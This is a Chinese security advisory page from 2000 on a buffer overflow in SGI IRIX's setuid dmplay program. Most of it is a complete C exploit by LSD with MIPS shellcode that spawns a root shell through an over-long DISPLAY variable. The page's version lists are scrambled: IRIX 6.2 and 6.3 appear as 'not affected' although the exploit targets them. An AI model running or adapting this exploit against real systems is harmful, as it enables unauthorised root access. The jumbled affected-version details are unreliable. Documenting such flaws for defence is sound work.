首页 -> 安全研究
安全研究
安全漏洞
IRIX dmplay缓冲区溢出
发布日期:2000-08-04
更新日期:2000-08-04
受影响系统:
不受影响系统:
SGI IRIX 6.3
SGI IRIX 6.2
描述:
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.4
SGI IRIX 6.5.3m
SGI IRIX 6.5.3f
SGI IRIX 6.5.3
SGI IRIX 6.5.2m
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
某些版本IRIX下的dmplay存在缓冲区溢出。dmplay用于在IRIX下播放视频剪辑,由于
它使用了X Client技术,需要访问DISPLAY环境变量,但是并没有仔细检查该变量值
长度,提供了缓冲区溢出的机会。
<* 来源:LSD contact@lsd-pl.net *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*## /usr/sbin/dmplay #*/
#define NOPNUM 800
#define ADRNUM 156
#define PCHNUM 148
#define TMPNUM 52
char shellcode[] =
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[] =
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[] = "\x24\x0f\x12\x34";
main ( int argc, char * argv[] )
{
char buffer[10000], adr[4], pch[4], tmp[4], *b, *envp[2], display[128];
int i;
printf( "copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n" );
printf( "/usr/sbin/dmplay for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n" );
if ( argc != 3 )
{
printf( "usage: %s {62|63} xserver:display\n", argv[0] );
exit( -1 );
}
if ( !strcmp( argv[1], "62" ) )
{
*( ( unsigned long * )adr ) = ( *( unsigned long ( * ) () )jump)()
+ 10396 + 32;
*( ( unsigned long * )pch ) = ( *( unsigned long ( * ) () )jump)()
+ 10396 + 32 + 900 + 30540;
*( ( unsigned long * )tmp ) = ( *( unsigned long ( * ) () )jump)()
+ 10396 + 32 + 8000;
}
if ( !strcmp( argv[1], "63" ) )
{
*( ( unsigned long * )adr ) = ( *( unsigned long ( * ) () )jump)()
+ 10348 + 32;
*( ( unsigned long * )pch ) = ( *( unsigned long ( * ) () )jump)()
+ 10348 + 32 + 900 - 84;
*( ( unsigned long * )tmp ) = ( *( unsigned long ( * ) () )jump)()
+ 10348 + 32 + 8000;
}
sprintf( display, "DISPLAY=%s", argv[2] );
envp[0] = display;
envp[1] = 0;
b = buffer;
for ( i = 0; i < NOPNUM; i++ )
{
*b++ = nop[ i % 4 ];
}
for ( i = 0; i < strlen( shellcode ); i++ )
{
*b++ = shellcode[ i ];
}
*b++ = 0xff;
for ( i = 0; i < ADRNUM; i++ )
{
*b++ = adr[ i % 4 ];
}
for ( i = 0; i < TMPNUM; i++ )
{
*b++ = tmp[ i % 4 ];
}
for ( i = 0; i < PCHNUM; i++ )
{
*b++ = pch[ i % 4 ];
}
*b = 0;
execle( "/usr/sbin/dmplay", "lsd", buffer, 0, envp );
建议:
暂无
临时解决办法:
去掉它的suid root属性
浏览次数:5608
严重程度:0(网友投票)
绿盟科技给您安全的保障